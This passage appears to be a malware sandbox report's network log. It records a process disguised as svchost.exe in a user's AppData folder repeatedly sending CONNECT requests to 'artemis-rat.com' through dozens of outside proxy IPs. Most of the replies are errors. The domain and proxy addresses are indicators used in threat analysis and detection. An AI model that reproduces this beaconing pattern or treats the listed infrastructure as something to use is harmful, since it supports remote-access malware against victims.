                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2471192.168.2.558039184.181.217.194414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.403796911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2472192.168.2.558211172.67.181.1078043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.403963089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.558725119 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2473192.168.2.558178162.214.225.2234841443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.408086061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.880251884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.567991972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.677370071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.771322966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.880585909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2474192.168.2.55798885.214.118.988043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.409156084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.731313944 CET309INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.23.1
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 157
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 33 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.23.1</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2475192.168.2.557914119.3.215.41888843220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.409171104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2476192.168.2.55799843.131.246.771567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.411971092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2477192.168.2.558125129.213.150.205808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.430181980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2478192.168.2.558019150.109.243.1561567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.430538893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2479192.168.2.55810834.135.166.248043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.430546999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2480192.168.2.557953203.95.198.170808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.431595087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2481192.168.2.55823952.35.240.119108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.448332071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.639142036 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2482192.168.2.55823147.184.175.164312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.450593948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.942749023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.646213055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2483192.168.2.558018185.81.153.162338943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.456830025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2484192.168.2.55809543.163.192.31567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.458607912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2485192.168.2.558079221.153.92.398043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.458722115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2486192.168.2.557099195.98.93.234108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.459112883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2487192.168.2.55800193.90.212.2415343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.463044882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2488192.168.2.558213104.145.235.200312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.467017889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.688371897 CET247INHTTP/1.0 307 Temporary Redirect
                                                                                    Server: squid/3.1.23
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 0
                                                                                    Location: http://check.unblock-us.com/?url=artemis-rat.com%3A443
                                                                                    Connection: keep-alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2489192.168.2.55708951.75.126.150422843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.467685938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2490192.168.2.557938116.199.168.1414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.473506927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2491192.168.2.558297172.67.38.968043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.502791882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.656886101 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2492192.168.2.55807051.83.140.70818143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.512089968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.845030069 CET325INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.14.2
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 173
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.2</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2493192.168.2.55806880.67.8.68043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.514889002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2494192.168.2.558027103.49.202.2528043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.514964104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2495192.168.2.5580468.219.177.1341567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.515427113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2496192.168.2.55811382.113.157.1223128043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.515532970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2497192.168.2.55809945.120.178.197108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.517762899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2498192.168.2.558126217.69.121.141580643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.518068075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.820242882 CET459INHTTP/1.1 407 Proxy Authentication Required
                                                                                    Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization."
                                                                                    Proxy-Connection: close
                                                                                    X-Webshare-Error: 407
                                                                                    X-Webshare-Reason: invalidpassword
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Length: 121
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e
                                                                                    Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2499192.168.2.558051200.174.198.95888843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.518193007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.333441019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.443104982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.537084103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.849498034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2500192.168.2.55809458.234.116.1978043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.519644022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2501192.168.2.55815693.190.142.572654143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.520140886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.820435047 CET226INHTTP/1.1 403 Forbidden
